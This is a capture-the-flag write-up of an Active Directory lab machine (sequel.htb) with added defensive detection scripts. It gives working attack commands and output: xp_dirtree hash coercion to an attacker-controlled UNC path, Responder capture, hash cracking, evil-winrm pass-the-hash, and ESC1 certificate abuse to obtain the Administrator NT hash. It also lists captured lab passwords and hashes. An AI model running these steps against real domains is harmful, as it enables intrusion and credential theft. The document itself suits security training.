Scanning
> TARGET=10.129.117.21 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-02-27 04:30:41Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-02-27T04:32:19+00:00; +7h59m54s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after: 2023-11-18T21:20:35
| MD5: 869f7f54b2edff74708d1a6ddf34b9bd
| SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-02-27T04:32:18+00:00; +7h59m54s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after: 2023-11-18T21:20:35
| MD5: 869f7f54b2edff74708d1a6ddf34b9bd
| SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-02-26T17:37:34
| Not valid after: 2053-02-26T17:37:34
| MD5: 3189c5c21cffae471312d7d6c1aeffa6
| SHA-1: b1c81fd5be77d26a59eed105097d70626c695ae3
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2023-02-27T04:32:19+00:00; +7h59m54s from scanner time.
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after: 2023-11-18T21:20:35
| MD5: 869f7f54b2edff74708d1a6ddf34b9bd
| SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
|_ssl-date: 2023-02-27T04:32:19+00:00; +7h59m54s from scanner time.
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-02-27T04:32:20+00:00; +7h59m54s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after: 2023-11-18T21:20:35
| MD5: 869f7f54b2edff74708d1a6ddf34b9bd
| SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49677/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49698/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49702/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
54350/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
kerberos enum
> kerbrute userenum -d sequel.htb --dc 10.129.117.21 /usr/share/wordlists/kerberos_enum_userlists/A-Z.Surnames.txt
smb share
> smbclient -L \\\\10.129.117.21 -N
lpcfg_do_global_parameter: WARNING: The "syslog" option is deprecated
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Public Disk
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
> smbclient \\\\10.129.117.21\\Public -N
lpcfg_do_global_parameter: WARNING: The "syslog" option is deprecated
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Nov 19 06:51:25 2022
.. D 0 Sat Nov 19 06:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 08:39:43 2022
smb: \> get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (21.8 KiloBytes/sec) (average 21.8 KiloBytes/sec)
- db credential found in the PDF:
PublicUser:GuestUserCantWrite1
"For new hires and those that are still waiting for their users to be created and perms assigned: you can sneak a peek at the Database with user PublicUser and password GuestUserCantWrite1."
mssql
- connect to mssql using the above credential; the login is low-privileged, so xp_cmdshell can neither be enabled nor executed:
> impacket-mssqlclient sequel.htb/PublicUser:GuestUserCantWrite1@10.129.117.21
SQL> enable_xp_cmdshell
[-] ERROR(DC\SQLMOCK): Line 105: User does not have permission to perform this action.
[-] ERROR(DC\SQLMOCK): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(DC\SQLMOCK): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
[-] ERROR(DC\SQLMOCK): Line 1: You do not have permission to run the RECONFIGURE statement.
SQL> xp_cmdshell
[-] ERROR(DC\SQLMOCK): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
xp_dirtree
xp_dirtree lists the contents of a directory and, unlike xp_cmdshell, is executable by this low-privileged login. Because it accepts a UNC path, pointing it at a share we control makes the SQL Server service account authenticate to our host, where Responder captures the NetNTLMv2 hash:
SQL> exec master.dbo.xp_dirtree '\\<ip>\dfasdf'
> responder -I tun0
[SMB] NTLMv2-SSP Client : 10.129.117.21
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::sequel:4189e898a57961d3:87C71385E26785F2035C9C2C5C04BA96:01010000000000000013DC44FC49D901488A3EB20645F94A0000000002000800450032005A00530001001E00570049004E002D0032004A004C0034004C0046003200480049004D004A0004003400570049004E002D0032004A004C0034004C0046003200480049004D004A002E00450032005A0053002E004C004F00430041004C0003001400450032005A0053002E004C004F00430041004C0005001400450032005A0053002E004C004F00430041004C00070008000013DC44FC49D9010600040002000000080030003000000000000000000000000030000074C46AD20107C4E66712E50A1E8B6CC1CF6DCFDA0749DDB7E91819A2F16B85390A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00320031000000000000000000
- crack the NetNTLMv2 hash of sql_svc (hashcat mode 5600):
REGGIE1234ronnie
> hashcat.exe --force -m 5600 hash.txt rockyou.txt
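The coercion above leaves a footprint on the SQL host: the database engine process itself opens an outbound SMB connection to a host that is not a file server. The following is an added detection example (not the writeup's code) over constructed Sysmon Event ID 3 records; the sqlservr.exe path, the sanctioned file-server list and the destination addresses are assumptions.

```python
# Added example (not the writeup's code): detect the SQL Server service being coerced into an outbound
# SMB authentication, which is what xp_dirtree against an attacker-controlled UNC path causes.
import re
from ipaddress import ip_address, ip_network

ALLOWED_SMB_SERVERS = [ip_network("10.129.117.30/32")]   # assumed sanctioned file servers (constructed)
SMB_PORTS = {"445", "139"}
KV = re.compile(r"(\w+)=(.*?)(?= \w+=|$)")             # key=value pairs; values may contain spaces

# Constructed Sysmon Event ID 3 records flattened to one line each; the paths and IPs are assumptions.
SQL = "C:\\Program Files\\Microsoft SQL Server\\MSSQL15.SQLMOCK\\MSSQL\\Binn\\sqlservr.exe"
SAMPLE_EVENTS = [
    f"EventID=3 Image={SQL} User=SEQUEL\\sql_svc DestinationIp=10.129.117.30 DestinationPort=445 Initiated=true",
    f"EventID=3 Image={SQL} User=SEQUEL\\sql_svc DestinationIp=10.10.16.21 DestinationPort=445 Initiated=true",
    "EventID=3 Image=C:\\Windows\\explorer.exe User=SEQUEL\\ryan.cooper DestinationIp=10.10.16.21 DestinationPort=445 Initiated=true",
    f"EventID=3 Image={SQL} User=SEQUEL\\sql_svc DestinationIp=10.129.117.21 DestinationPort=1433 Initiated=false",
]

def parse_event(line):
    return dict(KV.findall(line.strip()))

def coerced_smb_alerts(lines, allowed=ALLOWED_SMB_SERVERS):
    """Return sqlservr.exe-initiated SMB connections to hosts outside the sanctioned file servers."""
    alerts = []
    for ev in map(parse_event, lines):
        if ev.get("EventID") != "3" or ev.get("Initiated") != "true":
            continue                                     # only outbound network connections
        if not ev.get("Image", "").lower().endswith("\\sqlservr.exe"):
            continue                                     # only the database engine process
        if ev.get("DestinationPort") not in SMB_PORTS:
            continue
        dst = ip_address(ev["DestinationIp"])
        if any(dst in net for net in allowed):
            continue                                     # expected backup/file-share traffic
        alerts.append({"user": ev.get("User"), "dst": str(dst), "port": ev["DestinationPort"]})
    return alerts
```

Revoking EXECUTE on xp_dirtree (and xp_fileexist) from public, and enforcing SMB signing plus egress filtering for the SQL host, removes the capture path the detection is watching for.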
> evil-winrm -u sql_svc -p REGGIE1234ronnie -i sequel.htb
- another user on the box: ryan.cooper
- enumerate the filesystem: C:\sqlserver\logs holds a backup of the SQL Server error log
*Evil-WinRM* PS C:\sqlserver\logs> ls
Directory: C:\sqlserver\logs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAK
*Evil-WinRM* PS C:\sqlserver\logs> type ERRORLOG.BAK
- credential found: a failed logon where a password was typed into the username field, recorded in the error log:
NuclearMosquito3
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
- log in as ryan.cooper with this password to get the user flag
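The ERRORLOG entry above is a known hygiene failure: a secret typed into the login field is written to a world-readable log as a "user". An added example (not the writeup's code) that scans ERRORLOG for failed logons naming a principal that does not exist and pairs each with the next successful login from the same client; the login inventory and the two extra log lines are constructed.

```python
# Added example (not the writeup's code): find ERRORLOG failed-logon entries whose "user" is probably a
# password typed into the login field, the hygiene slip that leaked ryan.cooper's credential above.
import re
from datetime import datetime, timedelta

LINE = re.compile(r"^(?P<ts>\S+ \S+)\s+Logon\s+(?P<msg>Logon failed|Login succeeded) for user "
                  r"'(?P<user>[^']*)'.*\[CLIENT: (?P<client>[^\]]+)\]")
KNOWN_LOGINS = {"sequel\\ryan.cooper", "sequel\\sql_svc", "publicuser", "sa"}   # assumed login inventory

# Constructed log: the failed-logon line from the writeup plus hypothetical lines around it.
SAMPLE_LOG = """\
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:25.11 Logon       Login succeeded for user 'sequel\\Ryan.Cooper'. Connection made using Windows authentication. [CLIENT: 127.0.0.1]
2022-11-18 14:02:10.00 Logon       Logon failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.129.117.40]
"""

def parse_logons(log):
    """Logon-related ERRORLOG lines as dicts; other lines (startup, backups, ...) are ignored."""
    events = []
    for m in filter(None, map(LINE.match, log.splitlines())):
        events.append({"ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"),
                       "ok": m["msg"] == "Login succeeded", "user": m["user"], "client": m["client"]})
    return events

def likely_leaked_secrets(log, known=KNOWN_LOGINS, window=timedelta(minutes=5)):
    """Failed logons for a principal that does not exist, paired with the next real login from the same client."""
    events, leaks = parse_logons(log), []
    for i, ev in enumerate(events):
        if ev["ok"] or ev["user"].lower() in known:
            continue                                 # a real account failing is a brute-force question, not a leak
        follow = next((e for e in events[i + 1:]
                       if e["client"] == ev["client"] and e["ok"] and e["ts"] - ev["ts"] <= window), None)
        leaks.append({"value": ev["user"], "client": ev["client"],
                      "likely_owner": follow["user"] if follow else None})
    return leaks
```

Every value this returns should be treated as a credential to rotate, and the log file itself should not be readable by ordinary users of the host.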
privilege escalation
PS C:\Users\Ryan.Cooper\Documents> .\certify.exe find /vulnerable
[!] Vulnerable Certificates Templates :
CA Name : dc.sequel.htb\sequel-DC-CA
Template Name : UserAuthentication
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
WriteOwner Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
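The template above is exploitable because four properties line up at once, which is what an auditor should check for across every template rather than only the one Certify happened to list. An added example (not the writeup's or Certify's code) that parses Certify-style "find" output and reports templates meeting every ESC1 condition together with the low-privileged groups allowed to enroll; the sample reuses the output above plus a hypothetical "ApprovedUser" template that requires manager approval.

```python
# Added example (not the writeup's code): flag ESC1-style templates in Certify "find" output.
AUTH_EKUS = {"Client Authentication", "Smart Card Logon", "PKINIT Client Authentication", "Any Purpose"}
LOW_PRIV_SIDS = {"S-1-1-0", "S-1-5-11"}    # Everyone, Authenticated Users
LOW_PRIV_RIDS = ("-513", "-515", "-545")   # Domain Users, Domain Computers, BUILTIN\Users
# Constructed sample: the template above plus a hypothetical one that requires manager approval.
SAMPLE = """\
CA Name : dc.sequel.htb\\sequel-DC-CA
Template Name : UserAuthentication
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
Enrollment Rights : sequel\\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513
Template Name : ApprovedUser
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : PEND_ALL_REQUESTS
pkiextendedkeyusage : Client Authentication
Enrollment Rights : sequel\\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513
"""

def parse_templates(text):
    """One dict per template; every field is a list so 'Enrollment Rights' can hold several principals."""
    templates, cur, last_key = [], None, None
    for line in (l.strip() for l in text.splitlines() if l.strip()):
        if " : " in line:
            key, val = (p.strip() for p in line.split(" : ", 1))
            if key == "Template Name":
                templates.append(cur := {})
            if cur is not None:
                cur.setdefault(key, []).append(val)
            last_key = key
        elif cur is not None and last_key == "Enrollment Rights" and "S-1-" in line:
            cur[last_key].append(line)  # continuation line: one more enrolling principal
    return templates

def esc1_findings(templates):
    out = {}
    for t in templates:
        first = lambda key: t.get(key, [""])[0]
        ekus = {e.strip() for e in first("pkiextendedkeyusage").split(",")}
        vulnerable = ("ENROLLEE_SUPPLIES_SUBJECT" in first("msPKI-Certificate-Name-Flag")  # enrollee picks the UPN
                      and bool(ekus & AUTH_EKUS)                                          # cert usable for logon
                      and "PEND_ALL_REQUESTS" not in first("mspki-enrollment-flag")      # no manager approval
                      and first("Authorized Signatures Required") in ("", "0"))
        enrollers = [p for p in t.get("Enrollment Rights", [])
                     if p.split()[-1] in LOW_PRIV_SIDS or p.split()[-1].endswith(LOW_PRIV_RIDS)]
        if vulnerable and enrollers:
            out[first("Template Name")] = enrollers
    return out
```

Any template this reports is fixed by clearing ENROLLEE_SUPPLIES_SUBJECT, requiring manager approval, or restricting enrollment to the groups that actually need the template.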
- request a certificate from the vulnerable template with Administrator as the alternative name (ESC1: ENROLLEE_SUPPLIES_SUBJECT lets the enrollee choose the subject, the template allows Client Authentication, no approval or signatures are required, and Domain Users can enroll)
> Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator
- copy the generated .pem certificate and key from the output into cert.pem, then convert it to .pfx format
> openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
> python3 /root/tools/PKINITtools/gettgtpkinit.py -cert-pfx cert.pfx -dc-ip 10.129.117.21 sequel.htb/Administrator admin.ccache
2023-02-27 01:16:19,092 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2023-02-27 01:16:19,245 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2023-02-27 01:16:27,755 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2023-02-27 01:16:27,756 minikerberos INFO dd4810321e31ea6b1bcfe63076b3ff12909a8952b0f2fc60d11c2a00b8f81a8b
INFO:minikerberos:dd4810321e31ea6b1bcfe63076b3ff12909a8952b0f2fc60d11c2a00b8f81a8b
2023-02-27 01:16:27,768 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
> export KRB5CCNAME=admin.ccache
> python3 /root/tools/PKINITtools/getnthash.py sequel.htb/Administrator -k dd4810321e31ea6b1bcfe63076b3ff12909a8952b0f2fc60d11c2a00b8f81a8b
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
a52f78e4c751e5f5e17e1e9f3e58f4ee
- connect to fetch the root flag
> evil-winrm -u Administrator -i sequel.htb -H a52f78e4c751e5f5e17e1e9f3e58f4ee